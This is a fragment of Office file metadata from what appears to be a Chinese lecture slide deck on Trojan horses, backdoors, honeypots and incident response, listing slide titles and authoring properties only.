      <vt:lpstr>特洛伊木马隐蔽性</vt:lpstr>
      <vt:lpstr>木马存放位置及文件名</vt:lpstr>
      <vt:lpstr>温故而知新——特洛伊木马隐蔽性</vt:lpstr>
      <vt:lpstr>木马基本通信方式</vt:lpstr>
      <vt:lpstr>反向连接</vt:lpstr>
      <vt:lpstr>使用UDP协议</vt:lpstr>
      <vt:lpstr>代码注入</vt:lpstr>
      <vt:lpstr>用ICMP来通讯</vt:lpstr>
      <vt:lpstr>进程隐藏</vt:lpstr>
      <vt:lpstr>特洛伊木马潜伏性</vt:lpstr>
      <vt:lpstr>其它恶意代码 </vt:lpstr>
      <vt:lpstr>后门</vt:lpstr>
      <vt:lpstr>木马与后门的防范方法</vt:lpstr>
      <vt:lpstr>蜜罐技术</vt:lpstr>
      <vt:lpstr>蜜罐技术</vt:lpstr>
      <vt:lpstr>蜜罐</vt:lpstr>
      <vt:lpstr>蜜罐架构</vt:lpstr>
      <vt:lpstr>网络应急响应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zeze</dc:creator>
  <cp:lastModifiedBy>searhapsody</cp:lastModifiedBy>
  <cp:revision>1259</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-24T04:00:11Z</dcterms:modified>
</cp:coreProperties>
</file>